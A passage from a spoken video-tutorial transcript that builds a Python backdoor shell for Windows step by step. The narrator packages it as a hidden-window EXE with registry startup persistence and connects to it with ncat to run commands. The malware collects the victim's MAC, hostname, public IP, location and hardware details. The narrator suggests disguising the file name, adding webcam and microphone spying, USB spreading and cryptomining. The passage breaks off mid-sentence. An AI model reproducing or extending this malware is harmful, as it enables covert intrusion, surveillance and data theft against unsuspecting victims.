Okay, so this is the code that we are going to be doing today in this tutorial. Now, as you can see, it may look like a lot of code, and you may be thinking, oh, this is going to be a bit complicated, a bit too much. But honestly, when we get into it, we're going to go through it, and you'll see it's not that complicated at all, to be honest. But yeah, this is the code. And it's going to be quite interesting, actually. I think it's quite interesting creating this. And yeah, I'm going to show you an example of it working now. So we'll get rid of that. Now, I've already turned this code into an EXE. Now, I know a lot of you have asked in the comments on some videos about how we can get persistence if the computer shuts down. You know, the code is not going to run. Well, as we've got it into an EXE now, we also have persistence, because in that code there's some persistence. So what I'm going to do is I'm going to open up CC Cleaner, and this is going to show you what programs start up when the computer starts up and the user logs in. So you'll be able to see, and then we're going to run the reverse shell EXE. We're going to have a look again, and you'll see that it's been added to the registry. So we're going to go to Tools, Startup. So as you can see, we've got CC Cleaner Smart Cleaning. So whenever I log into my computer, this program here starts up and it will be there. We've also got Windows Defender. So Windows Defender, obviously, yep, starts up. And you may have some other programs that have joined themselves, but added themselves to the registry basically to start up. So ours is not in there, so I'm going to run the reverse shell. I'm going to open up this as well so we can basically send commands to our reverse shell in a minute, but I'm going to click that reverse shell and nothing's going to pop up. The user will not even know it's worked, but yep, there you go, reverse shell. It's in hidden mode, so no console comes up, which is what you'd want to do in real life. So now let's have a look first and see, where is it, CC Cleaner. Let's go back to here and then back to startup. Now, as you can see, program, we've got rev shell underscore server, so the reverse shell. And then we've got it's on desktop, rev shell underscore server.exe. So now the reverse shell exe that we just created, that will start up every single time this computer turns off and turns back on. I log in, that reverse shell will just start up, and the target user would not know anything about it. Obviously, you'd change the name, reverse shell, maybe call it like Windows something or other, you know, make it look a bit more legit. But this is just to show you like reverse shell, pretty easy to understand. Now we're going to actually connect to the TCP reverse shell server that would be running on the target machine. Now the code is only a server. Now I know some people, they create a server and then they create a client and use the client. I don't see the point in that. We can just use ncat. Much easier, much more simpler. We can just concentrate on the malware that goes to the target. We'll use this. So ncat, then local host is what it's running on for the example, which is running on my local host. And then the port, which is 5000. Press enter. Now, as we can see, we've got rev shell in brackets, and then you have connected. That is a message from the reverse shell telling you that you've connected. And as you can see, we've got this little like dot and arrow. That's where you type your commands. So if I press ls, it's giving me FUD desktop any reverse shell. So it's giving me what's on desktop. If I go cd ... which will bring me back a directory, a folder, we've got rev shell change directory. So the reverse shell has messaged us saying that we've changed directory. We do ls again. Now we're into a different folder. We can go back again, ls, we can clear it like a normal shell. So you can do normal shell commands as if you were on the command prompt on that machine. So that's cool. You can do a lot of stuff with that, but we can also add in our own classes to do our own, like say, commands. And I've added in a class called common data, and I'm going to show you it now. So you do data dot, and then we've got a couple of data, it's called class, we've got a couple of class methods to go with that. So like data IP is not reckonable size command. What's that? Data dot mac. Okay, so we've got data dot mac, and we've got the MAC address here. We can do data dot location United States. Now obviously I'm not in the United States. I'm not using my actual IP. I'm using a private VPN through Proxyfire, and I'm routing all my traffic through Tor. So any traffic through the Tor is going through Tor, just so I don't give away my location. Just to let you know, we can do data.machine Windows, data.core AMD64, data.hostname. We've got the laptop name, host name. What else is there? Data.ip should. Okay, there we go. Yeah, data.ip. We've got an IP, obviously not mine, so I don't have to blur it out. It's a bit easier for me. So yeah, these are all like methods that I created. And the good thing about the script is, when we go through it, we create it, you'll see how it was made. It's made in such like a modular way that you can actually add more classes to do like more things, you know. So you could have one technically like attack dot, and then like webcam to view webcam, or attack dot mic to listen through the mic. You can add all these in as you go, the further on you go. To start off with, we're just going to obviously get the TCP connection. We're going to do the sockets. We're going to get the messaging going, and then we're going to build on it slowly. But if you watch it all the way through, you should learn a lot more than just copying the code and running it. And yeah, persistence along with an EXE, you can do many things with that. You can create another type EXE, you put on a USB, and that automatically downloads it and puts it on there, or you can pull the code from like a server online. Many things we can do, but let's get into the code now. As you've seen it basically working. Who am I? Basically, yeah, this reverse shell is pretty cool. And then you just do exit. Now it's exited on the target machine. The reverse shell would have quit. It's just gone. But when they turn the computer off, turn back on, the reverse shell will load back up again, and you can just connect. So yeah, I actually just quickly edited the code, but we can actually connect to it whenever we want. We can type exit, which will close the client socket, which is us connecting to it, and then you just press Control-C to get out of the NCAT program. Or we can just press Control-C, or if the program, say, was to crash, or your laptop crashed, what it will do is it will hit an exception when it tries to read data for a message that it's receiving. It won't be able to receive any data because our client socket will have disappeared basically. So it'll hit that exception, and it'll do exactly the same as if we were to exit. It will close the client socket, which is what it needs to do, and then it will go to another function which is just going to listen for another incoming connection, and it stays on the listening until it receives the connection. So that way there's no chance of us not leaving the connection, or something happening to your computer and you have to wait until they shut down and then come back online to connect. So we can do NCAT, and then the host, so localhost port 5000, and then we'll just do say ls, so we've got command, and then we can do exit. So now we've closed our client socket on their machine, but the reverse shell is still binding to a host and a port, and it's now listening for a connection again. So you do Control C to get out of the NCAT program. And now if we want to go back to the reverse shell later and do some more stuff, say on the target machine, we can just basically log back in, and we're back in, nice and easy. Now let's say the program crashed all of a sudden, so we'll just press Control C, and we didn't even exit properly, it just crashed. We can actually still get back in because it's done exactly the same thing, just programmed it to do the same thing. Close our client socket and then go to the listening function. So ncat localhost 5000, we connected again, so we are safe. There's no chance of us not being able to get back in for whatever reason, so that's cool. So now we can move into the code, and it's gonna be cool. Okay, so to start off with, for our Python reverse TCP shell, we're gonna have to import the sockets library. So we're gonna do imports, and we're just gonna import socket. Now we're gonna make a class, so we're gonna do class, and we're just gonna call it rev shell underscore server, or actually we'll just call it reverse shell. That's cool. So we can make a couple of, say, class variables. We can, for the host, the port, and the buffer size, because we can use that throughout. So we can do class variables, and then we're just going to do host equals localhost, so that'll be the host that we bind the socket to, and then the port we can just do 5000, and then we're going to have a buff underscore size of, we'll do 2048. 2048 will be plenty, because we're only going to be sending like commands and that, and the commands are very short anyway, you know, they're not going to be paragraphs, are they? So that's fine. And we're using NCAT, so we don't have to mess around with building a client just to send commands basically and receive data. NCAT can do that for us. We can just concentrate on the malware. So that's cool. So now we're going to have to initialize our class. So we're going to do def underscore init and then self. This is our basically constructor in C++, other languages like that. And what we put under the init method, that will get executed and start basically as soon as the program runs. So we can what we're going to do, we're going to create the TCP socket. So we can do create TCP socket. Now we're going to do self.s. So s is going to be our variable for the socket. So we're going to do self.s equals socket.socket, and then socket.af underscore inet, and that's the address family. Now we're going to do socket.sock underscore stream. Now the reason it's sock underscore stream, that's basically for TCP. If we were using datagram, it'd be sock underscore dgram. A raw socket is like something like sock underscore r socket or something like that. But we can look into the socket documents as well, which is what I did when I actually went through and was creating this. I looked into the socket documents. It's the same with any other library. If you don't know what there is, you can just look through the docs. It's not good. It's not a bad thing. Then we've got socket.ip proto underscore TCP. So now we've just created our TCP socket, and that's going to work on Windows. That'll be fine. So now we need to bind this socket to an address. So we're going to bind socket to the address, and we're going to bind it to the host and the port. So self.s.bind, and it's a tuple, so we have got two parentheses left and right. We're going to do self.host and then self.port. Now we're using self here, even though they're class variables. We could have used reverse shell, but if you use self, it will look for obviously reverse shell first, and then it'll go through self. We're fine with using that. Now we need to listen basically for some connections, because we've binded the host and the port to the address. We've got a socket. We need to start listening for some connections. So we can do listen for connections, and we're going to do self.s.listen. Now we're not putting any integers in there. You can specify yourself, or like 10, 5. If you leave it empty, the documents say that it will give you a good amount. Basically, it will decide for itself. That's fine. We're only having one person connecting to this, and that's the attacker, I guess. Now we can just do print, and then something like this. We can do listening on, and then self.host curly brace, and then curly brace self.port. Now this print is more so for when you're just testing it out. Obviously when you turn it into an EXE and you're running it in like the hidden mode, so you don't get a console come up and that, you're not going to see this, but it's just for when you're testing it out. Basically you can see how the messaging and the TCP works and so on. Okay, so now we're going to do we've initialized the socket to listen. Now we need to do self.client underscore socket, and we're going to do self.client underscore address, and we're going to equal that to self.accept. So self.s.accept, self.s.accept, it waits for an incoming connection, so it stalls on self.accept. This will, and it'll just wait for a connection. Now when a connection is received, you get two pairs of basically info. It says here host address and port. So basically we're going to get the client socket. This is what we use to send and receive data. This client socket here will be, say, us connecting through NCAT to the server, and then the client address, that just gives us the host and port of our program which we're connecting with, basically. But this is what we're going to be using, so that's the most useful thing. So we've set up basically the sockets. Now we've got the socket, we're binding it to the host and the port, we're listening for a connection, we are going to accept a connection. So let's test that out. And we'll create we need to create a receive method and a send method, so we can send data and receive data. So we'll do that. So we've got def, and then we can do send underscore message self, and then the message that we want to send. So when you send the message through the sockets, it can't be a string, it's going to be bytes. So we're going to we're going to convert our message basically into UTF-8 bytes. So we do convert string, which is basically the message, into UTF-8 bytes. So we're going to do message equals bytes. F format, it's like a special format for Python 3 point something plus. Curly braces the message, and we'll leave it at that for now. And then we'll do comma, and then we'll do UTF-8. We'll give it that encoding because it needs that encoding. Now we can do send equals, and we're going to do self dot client underscore socket dot send all, and then message. Now it does have send and it has send all. We're going to use send all. So basically, it's just going to send all the data at once, and ncat is fine with that. Whereas if we're making our own client as well, we'd have to break, say, the message into chunks, then join them together, going through a loop and all that. It's a little bit of hassle, but we don't need to do that because we'll just use ncat. So that's cool. So we can send all the message, and then we can just do returns none if send all is successful. And now we can just return send. So that's cool. We've got our send underscore message method, class method, whatever, instance method actually, self. We've got that. So now we can do another method. We can do the receive. So we can do def, and then we can do receive underscore message, and then self, and we don't need any parameters with that. Then we can do receive equals self dot client underscore socket dot receive, and then we're going to do self dot buff underscore size. So the buff size will be 2048. That's plenty for the commands that we'll be given it. And then we can just do return value is a byte object representing the data received. And I got that. It's a bytes object representing the data received from the documents. Do you know what I mean? They work really quite useful. And then we can just return what we received. So that's nice and easy. So what we got? We got the socket set up. We got the send message and the receive message. Because in a minute we're going to load up ncat, and we're gonna see how the messaging works, and then we're going to build on it. So we got this. We've got the send message. We've got a receive message. Okay, what we're going to do now then is we're going to go back to the init method, and we're going to do print, and then this is just say for the testing, debugging, and then we're going to do accepted connection, and then we'll do curly brace self dot client underscore address 0, and then curly brace, and then self dot client underscore address, and then we'll index that to 1. 0, need a curly brace there. Okay, that's cool. Yeah, and now we're going to do self dot main. Now we haven't actually got our main, say main method yet, but we're going to create that now. So we're just going to def, and then main self, and then pass. So what we're going to do now then is we're going to send a message basically. So we can do self dot send underscore message, and I'm just going to do hello world. So I'm going to load up ncat. I'm going to run this now. I'm not going to load up another console just to run this reverse shell, because I've actually got like a little console terminal here anyway. Okay, yeah, hasn't run yet. We've got to do this as well. We've got to do if underscore name underscore equal to underscore main underscore and then we can do rev shell equals reverse shell. Reverse shell. Okay, cool. So we're going to run this again. It should do the socket, bind, wait for a connection. When we connect to the socket through NCAT, it will go to the main, and in main it's going to send us hello world, hopefully. So we'll do that now. Okay, only one usage of each socket address protocol is normally permitted. Self.host, self.port. Okay, yeah, didn't work because obviously I've still got that bloody reverse shell EXE in the background running, so it won't connect to the same address and port. So I need to exit these. You may need to do this yourself actually. Go into Task Manager, see if Python is still running. That's not what you want. So we can go back to this and we can run it now. And as we can see down the bottom here, let's pull it up a little bit. We've got listening on localhost 5000. So now I'm going to bring up CYG ring and I'm going to do ncat localhost and then port 5000, and we got accepted connection 127.0.0.1, that's localhost, and then we got the port. Now this port is what the NCAT program was on, that's its own port, and then we got hello world here. So we've created a socket, we've set the server, we've got send and receive methods, and it sends hello world and it works, that's fine. So you know, we're building up, we're getting there, we're getting the fundamentals basically in place first, and then we can start building much cooler stuff. So I'm going to exit out of that. May need to go Task Manager just to make sure Python is actually closed, which it has, which is cool. This is exited because obviously after sending this there's nothing for it else to do, so it closed after, but that's fine. So I'm going to bring this down, it's getting in the way. So now we can move on to the main method, which is going to be basically the main method. It's going to have a while loop, and the program is basically going to stay in that while loop until we quit our connection, and then it's going to go back to waiting, but we'll get into that anyway as we move through. So now we want to send a message like we did with the hello world, but we want to send a different message. So we're going to do send connection message to connected client, and what we're going to do is we're going to do if self.send underscore message, and then we're going to do rev shell in these square brackets, and we're going to do you have connected, and this just tells NCAT or whatever client that we're using to connect to the shell. It just tells us that yep, the connection has actually connected, we're good to go basically, otherwise we wouldn't really know, would we? So we're going to do if send that message is not equal to none, then we've got an error basically, because where is it? Yep, send message in the documents, it says that if this returns none, that it was successful. So if it's not none, then obviously some sort of error. So we can use this for debugging. So we can do error has occurred, and even though we are in an if statement, yeah, this method here or function, whatever you want to call it, will run. And when I'm coding sometimes like this, I usually have another tab like test.py, and I just do basic like little tests. If I'm not too sure on something, then I can come straight back to here. So we've got that error has occurred. So if we run this again now with ncat, so it's listening on localhost again, so we can bring up that and connect, and now we get rev shell you have connected, and then it's done. So we can exit ncat. Cool. So we're getting there, we're building it up as we go. So now what we want to do is the main part of our program. So main part of our program, I'm going to bring this up, but main part of our program will run a continuous while loop. So now we want to do the main part of our program, and we want to basically, we've sent a message from the reverse shell, which would be on the target machine, to the say attacker, to the client, which is ncat. So now we want to do the opposite. We want to see this reverse shell receive commands from the attacker using ncat. So that's going to be the main part of our program. The reverse shell main part of the program is receiving commands and doing stuff with it. So we're going to run a loop. So we're going to do while true, should be in a loop. We're just going to do message equals and then blank. Now we're going to just do chunk equals self dot receive underscore message, and it's going to obviously receive a buff size of 2048, which is plenty for our commands. They're not going to be anywhere near the buff size or any bigger, so that's fine. Then we can do message plus equals chunk dot, and then we're going to strip it, then we're going to decode it in UTF-8. So once we've done this, we can well true, we received the message, and we can just print it out for now and see what it if it comes up fine. So we'll do that, we'll run it, and we'll load up ncat once more. As you can see down here, it's listening on localhost 5000, so we'll connect to it again. Rev shell you have connected, and then say if we just type hello in caps, comes back hello. So now the reverse shell is receiving our commands. So we are receiving messages from the reverse shell, so that can send to us, and we can also now send messages to the reverse shell. So that's cool. But as you can see on here, hello, it's typing really weird, we're here, that's not really great. And then what we type here, and as you can see, I pull this up, got another message at the bottom there. We can type lol, hello, bye, food, and all the messages, they're coming up here. So that's cool, it's working. So we are going to exit this now, and this just exited as well, closed. So what we're going to do is we're going to make it a bit better format on ncat, instead of having it like start here and so on and so forth. And it's quite easy to do. Basically what we're going to do is on the send message, it just sends the message just like that. So I'll just send it like that, but we want it to be in a nice format, if you remember at the start when I showed you an example. So what we're going to do is we're going to do /n/n, and then we can do those two dots and an arrow. So what that will do is we'll run it again now, run that again, and it's listening on localhost 5000, and if we go back to ncat and we connect, we've got rev shell you have connected, and we've got a space, and then we've got 2 dots and the arrow, which is like our little where we type our commands basically. So now we can type commands like, say, if we did ls, and then obviously at the minute there's no functionality to these commands, it's just printed it to the reverse shell console, whatever. But it's a bit clearer in that. So that's cool. We're getting a bit more there. So now that's exited. So now we I'm going to get rid of the print message, and we need like a HQ, like a headquarters, where we filter the input, we filter the commands, and we do certain things with the commands. So what we can do is self.hq and then message. So we put the message in self.hq. Now we haven't created that method yet, but we are going to do it right now, basically in a minute. We're just going to put a comment, basically, headquarters, and then brackets like HQ for commands, functions, and so on, using the received message. So that's good. Now we're going to move down. We're going to do def HQ self and the message. So what we want to do is we want to be able to basically use the shell. We want to use the reverse shell. We want to be able to basically use the shell like we're on their computer, on their PowerShell or CMD or command prompt, basically. So to do that, we're going to do task equals sub process dot p open. But first of all, we're actually going to have to import sub process. So we'll go back up to imports. We'll do import sub process. So we'll come back down to here, p open. We're going to give it args. The args will be the message, and then we're going to do shell equals true. So we're popping the shell, which is good for us, not good for them. We've got std input equals subprocess.pipe. We'll just pipe that on. Std out equals subprocess.pipe. We'll move that on as well. Then when we get to std error, that can equal subprocess.std out. So now we're going to do std out and std error is going to equal task.communicate. Now you can going on the subprocess documents, it tells you a lot about what these do, etc., etc. And then we're going to want to do result from subprocess shell std out decoded in UTF-8. So we can do my result equals std out dot decode and then UTF-8. Otherwise it's going to come back in bytes, and we want it just to come back in a nice string, so it's easy to read, nice format, etc. So now we're going to let me see. We've got my result, and then we got that. So we want to send this back to the end client, basically. So we'll send that back to the client so you can see, and then we'll add some more functionality to it. So we'll just do self.send_message my result, and okay, let's run that. Listening on localhost 5000. So we're going to do ncat again. So now if we do say ls, as you can see, we've actually we've got basically some folders, and the 2 dots and the arrow has come back again with a nice space in between, so it's easy to read. So we can do cd that ls. As you can see, cd ... We're not getting told. It's not changing directory. Basically, we have to add in that, even though we are on the shell, we need to explicitly add in that functionality, which is what I wanted to show you. So we're gonna exit and quit that, and yeah, this is exited. So to get that functionality, we're gonna get rid of this for now, and we're gonna do if message, then we're gonna index it, and then 2. So if message index to 2 is equal to, then cd, we can do os.ch directory, so os.change directory, and then message, and then we'll index that to 3 onwards. So when we are on the shell and it comes across cd, which will be for changing directory, it will then go to the third index, so space and then whatever character we're doing, and it will change directory for us. So we can have a look at that by doing self.send_message, and then we will create the square bracket again, and we'll do rev shell to let us know that the reverse shell is telling us something explicitly, and then we can do changed directory. So if we just leave it at that, and we'll run it again, so we'll do that. As you can see, it's listening on localhost 5000. You can run this script in the Windows PowerShell, whatever, but I'm just running it here because it's easier and quicker for me. So now we're going to connect to it again. So we'll do ls, and as you see, it's accepted connection 127. Okay, that didn't work very well. Let me quickly have a look. If message is equal to cd. Okay, yeah, of course. If we didn't, I just typed ls and there's nothing. Yeah, so we'll do that. If message is cd, it will change directory, and it will tell us that we've changed directory. The next one is we'll do elif message, and then if it's from like 0 to 4 is equal to exit. What we're going to do is we're going to close client socket. We're not going to close the reverse shell socket, because then we're not going to connect until they turn the computer off and come back online. We want to close the client socket, which was our socket that connected to the reverse shell. So we're going to do self.client_socket.close, and I did actually make the mistake of closing the actual socket before, and I couldn't connect, and it took a couple of minutes to realize I need to close the client socket. But yeah, and then we can do go to, okay, that's for a bit later on. We'll close the socket, and yeah, we'll close the socket. We haven't written this ever function, but we'll get there. So we'll do go to socket underscore init method and listen for connection, because we're going to have another function in the end where when we close the socket, it will close the client socket, and then we have to jump out of the main loop and we have to go back to listening for a connection. Or we could have ran that in a while loop, and we could have put main on a thread, but seeing as there's only one person really that is going to be connecting to this, there's no need to do that. That would be for many clients connecting. So yeah, so we'll get to this self.socket_init init method in a bit, but it's there just to say. Then we've got else, and then this else is basically the ls. This else is basically you just using the shell like you normally would on your own computer. So we can do send result to client. So we're just going to send whatever result we get back from using the shell to the client. If we do cd, then obviously we'll explicitly change directory, and we'll send a message saying that we've changed directory. So send result to client, we'll do self.send underscore message, F for format, and then actually we don't need to do that, we could just do my result. That's cool. So we're going to test this out, and as you can see we are listening again on localhost 5000. We'll bring up ncat, connect to the reverse shell. Reverse shell, you have connected. The reverse shell has accepted the connection. So now if I do ls, ls is going through HQ to else, and it's just sending my result. And if we do cd ... back to go back, name OS is not defined. Okay, yeah, we've got to actually import OS. That would help. Import OS. So we'll run this again. It's listening localhost 5000. Connect to the reverse shell. So we'll do ls. So we've got the contents of directory. We'll do cd ... We've changed directory. We'll do ls again. Got some more folders. We can do cd d ls cd c. Yeah, it's cool. We can clear the screen just like normal console. And that. So yeah, we can do everything we could do basically on the shell on our own computer, on the target victim computer. That's cool. Now we want to get into some bit better stuff really. So we'll just exit that and get out of that. So this is exited. That's fine. Yep. So tasks, we can say this is for normal command prompt commands using the shell, because that's basically what it's for. Now we want to get some data, some data methods basically, so we can get like the IP, location, some information about the computer, maybe stuff like that. So what we're going to do is we're going to create. Let's see. We're going to create a common data class. So we got this. We'll create a common data class up here, because the reverse shell can send data to us. It receives our commands, and it executes the commands in the shell. And we have shell functionality at the minute, which is cool. That's fine. We want more though. So we'll come back up here. We'll do class, and then we'll do common data, and then def underscore init underscore self. We'll just do pass for now. So some sort of data that we may want. We can do def and then MAC. So for like the MAC address, and then we'll do self, and then we're going to do try, and then we're going to do MAC equals uuid dot uuid, and then the integer will be equal to uuid dot get node, and then dot hex, and then we're just going to index it -12. And that'll get the 12 integer hex number. I'm just going to return MAC. I'm going to do accept, and if we don't manage to get it for whatever reason, we're just going to return null. And also we're going to have to import another library, so we're going to import uuid. and you may have to pip install that, but I think all the libraries that we are using in this are actually just the common libraries that come with Python anyway, so that's quite cool. And we're going to make these all properties as well. All these methods on the common data, there's going to be properties. So we're going to do at property, which means when we want to use Mac, instead of doing Mac like that, we don't need to do that. It's just like a variable. Basically, we turn property into a variable. We can use it like a variable. So that's cool. So we got the Mac. We're gonna do another at property. We're gonna do def, and then the host name self, and then we'll do try host name equals socket dot get fq dn socket dot get host by name, and we're going to strip it. Now obviously I have looked through the docs before making this video. I don't just remember everything, if that's what you're thinking, you know, just in case you think like how I'm meant to remember all these stuff. You just look through the docs, you know, and we're going to just return null again if we don't get it, but we should get it all, but just in case. We're going to do another at property, then we're going to do def. Now we're going to get the public IP, so public underscore IP self. Scroll down a little bit. We're going to do a try, and then we're going to return URL lib dot request dot URL open, and then HTTPS, and then we're going to do API dot epify.org slash, and then dot read, and then we're going to decode it in UTF-8 as well. So it's like a nice string. Now the reason we're going to use URL lib instead of the requests library, which is actually easier and nicer to be honest, is because the request library does not work with py installer, so you won't be able to turn it into an EXE. All the libraries that I've used on this work fine with py installer, so we can turn it into an EXE, which means we can get persistence on computers, and yeah, it's actually a pretty damn good tool, this reverse shell. I've not seen anything better than probably what we are creating today, to be honest. So we're also going to need to import that library, so import URL lib dot request, and that'll be fine. Yeah. So what else do we need? We've got the public IP. Let's get the location, might be useful. So we'll do another at property def location self, and we can do try, and then data is going to equal URL lib dot request dot URL open HTTPS and then free geoip dot app slash JSON slash dot read, and then decode it again in UTF-8. Now I found this website a while ago. That's the only reason I know how to use it quickly with the JSON. And we're going to do JSON underscore data equal JSON dot loads, and then the data. So we're going to import up here, import JSON, just so we can use the JSON data that we're getting from that website. Okay, and then we want to do country underscore name equals JSON underscore data, and then we're going to index it to the just country name. They do have like city, and other things as well. So we've got country name, and then we can do city equals JSON underscore data city. Now the only reason I know how to type this out quickly is, like I said, I'd probably have a test.py. I'd probably make a request to here, read it, see what data comes back, put it in the JSON, loads, print out the JSON data, and then work out how to index it, and so on and so forth. That's just what you've got to do. But I've obviously done that, and it'll just take too much time to show everything. So with this, we're just going to return, and then we can just do %s, and then %, so it's just like a string format. I'm going to do country underscore name and the city, and we'll just do an accept, and if we don't get anything back, we'll just do null again. So now we've got the location. We can get what is it, the machine might be quite useful, so we can do self, and then just bring this up a little bit. We can do try again, and we're going to do return platform.system, and because we're doing platform, we're going to need to import platform. So we do import platform, and you can find out obviously what sort of things you can get from the docs. But yeah, we want system for the machine. We can do accept, and we can just return null once again. Now the next one, and I think this is the last one, is the core. So you know how powerful the system is. You know, if it has many cores, you could put like Bitcoin mining on their system. If it's a very crappy computer, there'd probably be no point. I don't know, it's up to you. I don't recommend any of that, by the way. We'll do try, and then return platform.machine, and once again we'll just accept, return null, and we'll just do the app property. Cool. So I think we've got quite a few here. Like I said, if you want to edit this and add more to the data that you want, you can do that, that's fine. So now we've got just some common data. Now we need to put that into our HQ, which is our headquarters, which filters the commands and does certain things with them. So we've got our data, that's cool. So we're going to go back down to HQ, headquarters. We've got our normal command prompt with the shell. Now we need to incorporate our data commands basically. So how we're going to go about that is we're going to make a little bit of space, and we are going to do if the message, then we're going to index it up to 0 to 5, so blank, and then end in 5. If that is equal to data dot, we know that we want to do a data dot command like data dot IP location, etc. So if we get data dot, it won't be doing any commands to the just normal shell. It'll be running common data methods and sending the reply back to us. So if it's equal to data, we need to first of all we need to create a an instance, an object of the class, of the common data class, so we can use it. So we're going to do data equals common data. So now we've just initialized an object of that class. So with that said, we can do if message and then index and then blank to 10, which will be for the data.mac, yeah, because data dot is 5, and then with the mac it's 10. So we do that equals to data.mac, and then we can do self.send underscore message, and then we just do data, as in so data, which is an object of common data, and then dot Mac. And because that we use properties here, see property, we are using it like a variable, like that. If we didn't use the property, we would have had to do that like a normal function, method, whatever you want to call them. So like that. And then we can do elif message and then 13. Now I already know these numbers because I worked them out earlier. You know, they're not just coming off the top of my head. I did actually, you know, count through it to work it out. But 13 is equal to, and then data dot hostname. We will do self dot send underscore message data dot hostname. Now you see these send underscore message and the receive underscore message methods that we created earlier, they just make it a little bit easier to program, you know, the code. So with that data.hostname, we can do elif message index 0 in it to 7 is equal to data.ip. We can do self.send underscore message data.ip. Oh no, public underscore IP is the method. Yeah, public underscore IP. Oh, haven't even got an accept there. Accept and then return null. So we've got try, accept, yeah, that's cool, that's cool. Okay, so with the public IP done, we can do elif message and then 13 equal to data dot location, and then we'll just do self dot send underscore message data dot location. And we'll do elif message and we'll index it from 0 to 12, and then if that is equal to data dot machine, we know that we want to send self dot send underscore message data dot machine, and then machine, we got core, so elif message, index it from 0 to 9 is equal to data dot core. We want to send self dot send underscore message. We want to send the data dot core that we get. So we're sending the returned data from each of the methods basically. So yeah, we've got core, which is the last one. So what we're going to do is we're going to test this out and see if it works. So we'll just run that, and it's listening on localhost 5000. We'll connect to the reverse shell. We're going to do ls, yeah, cd back, that works. Now we're going to try and do the data. So data dot location. Oh damn it! I'm going to have to blur that out anyway. Data dot core. So we're getting the core, but we're getting some sort of it's not recognized as an internal or external command operable program or batch file. So we're getting the what's it called? We're getting a reply with the actual data, but then we're also getting another reply with the error, with an error for some reason. And the reason for that is because it's going through here. It's equal to data. It's sending this, and then it's continuing to go down and open up the shell. And yeah, so we'll sort that out now. So we'll exit out of this. So what we want to do, just to get out of that basically, is if the message 0 to 5 is equal to data, we'll do our data stuff. Otherwise, we can just do else, and then it will do all this, instead of just coming down here anyway and then just sending it to the result. So we'll just move this up here like that. So now if it's equal to data, it's only going to send the data that we want for our data methods, and it won't go to the subprocess opening up a shell and all that. So now we'll try that again and see if we can just get the data reply without some error. So we'll run that now, listening on localhost, bring back up that, we'll do the ncat localhost 5000, connect to it, it's connected, ls, that's fine, cd back, ls, we'll clear that. Then we're going to do data dot core, and then we got the core, data dot machine, data dot what else is there, host name, null. Okay, maybe it didn't work this time. Data dot mac. Okay, so we just got mac didn't come up with the mac, and the host name also come back null. So what we're going to do is we're going to go back up to the common data methods. Little mistake, -12. We need 2 dots. Then we will get the mac. The host name, we've got get host by name. That's my mistake. It's get host name. So if we take the by, and it's socket.get host name, and for hex it's -12, and then the 2 dots, colons. We'll save that. Go back down to the reverse shell class. Go back down to our HQ, our headquarters, which is our main filtering for the commands. We've got the if message, and then the first 5 are data dot. It will do our common data class to give us all our data. Otherwise, it's going to go to the shell, and we can do normal shell commands. For CD, we've explicitly sorted out the change directory, because it doesn't happen in subprocess, so we sorted that out. We've got a way to exit the reverse shell whilst leaving the reverse shell on, so we can connect later. We just get it to close our client socket process, and in a bit it will go back to another function where it will just listen and wait for a connection. And if we don't change directory or exit, then if we're doing like ls or clear or any other shell commands, it will do that, and then it will just return the result. So with this HQ and this setup with if and then data else this, the good thing about this is if we wanted to add, like I said in the first part of the video, like an attack, say, we can do if message, and then say, I don't know, I'll just put 10 in there, but it's just a random number, equal to, say, attack dot, and then we could do like attack equals attack commands, and then we can have like attack if message something or other equal to attack dot webcam, attack dot mic. We can add in more sections to the reverse shell as we go on. Do you get what I'm saying? So it's quite cool, it's quite easy as well, to add in more if you want to. So yeah, we've got these. Let's go test that out again. We've got to do a lot of testing. So we were listening on localhost again. Bring up this, clear that, and we'll connect to it again. So we've connected lscd dot works. Yeah, that works. Clear. So we're going to do data.mac. We've now got the MAC address. I'll probably blur that out actually a little bit. And then we can do data.host name. And we've got the host name, so that works. There's no null reply. We've got that sorted. What I am actually going to quickly change is the command is quite close to the arrow and that. So if we go back up to what is it, send underscore message, and if we just put a space there and save that, just look a little bit better. So if we just exit, get out of that, and go back to the code. So that's cool. So actually we'll connect to it again, we'll start back up again. There's a couple of extra things I want to show you. So it's listening, join back. So what happens, yeah, we've got accepted connection, we know that anyway. So what happens if we were to say cd and give it a wrong command? What will happen then? Let's try it. Give it a wrong command, and now ncat is just fucked, and the program has just exited. So we need to deal with that basically. If we cd into a wrong folder or anything like that, it's ruined. So what we can do is we can wrap the HQ in a try and accept, and we'll see how that goes. So we'll wrap that, move that forward, try, and then accept, and we'll do accept exception as E. So obviously, yeah, the problem is the command basically. So if we just print E, and then we start that reverse shell again, connect back to it. So if I do cd and then some gibberish, we've got a Windows error, system can't find the file specified. So what we need to do, we didn't get told that. That's what the debugging information is telling us in the reverse shell. So all we need to do is we need to just send that debugging error to the client, which is us, the attacker, to our ncat client. So if we just exit this, so we can do we'll say this is for debugging, and we'll just comment that out, and then if we just do self.send underscore message, do the F for the format, and then we do the square bracket, and we do the old rev shell, so we know it's coming from the reverse shell, and then we can do curly braces E like that, and then we'll try it again. So we'll run it, and it's listening on localhost again. We'll connect back to it, so it's connected. We'll do cd and then just some gibberish, and as we can see, we've got rev shell win error 2, the system cannot find the file specified, blah blah blah, blah, and it's brought us back to our little icon here to do some more commands. That's what we wanted. Yeah, that's cool. So we'll just exit from that for now, and yeah, it's gone, exited. Okay, so we've sorted out the data commands that we created. We've got a shell to the machine, so we can do a lot of stuff on that. We've also got an exception, and if we get any errors or type the wrong command or anything, we're safe in that respect. So what we need to do now is we need to be able to connect to the reverse shell. When we exit, we need to be able to connect back to it, so we can just connect to it when we want. Basically, we need to do that, and then we'll move into the how to get persistence on it. But for now, we just need to be able to connect back to it. So to do that, we've got exit. So that's going to close the client socket, which is us connecting to it. That's our client socket. It's going to close that, and then it's going to go to self.socket_init. So we're going to create that up here. So we're going to do self.socket. We're going to do, what is it? Send message. So we're going to do def socket_init self. And then what we're going to do is, I'm actually just going to quickly copy paste this comment section bit here. So I don't want to write all that out. Just gives you a bit of info. Accept connection. Program will wait on accept until it receives a connection. Then we will jump to the main function. Client_socket is a new socket object able to send and receive data on the connection. The client socket is someone connecting to the reverse shell. The client address is just the address bound to the socket. Simple stuff. So what we can do is, for the socket_init method, after the reverse shell has closed our client connection, we can actually move this 3 lines here. We copy them, get rid of that, and we'll paste it in here. Just move that down there. So like I said, it will listen for a connection, but it stalls on the s.accept. Yeah, so once we've closed once the reverse shell has closed the client connection, it will come back to this method here, and it is going to wait to accept another connection, basically. And once it accepts that connection, it will print this just for debugging purposes, but you won't see that on the EXE. Once it accepts another connection, it will then go to main, and then we can repeat ourselves again for what we just did, basically with the commands, the data, and whatever else we wanted to add into our HQ, our headquarters. And 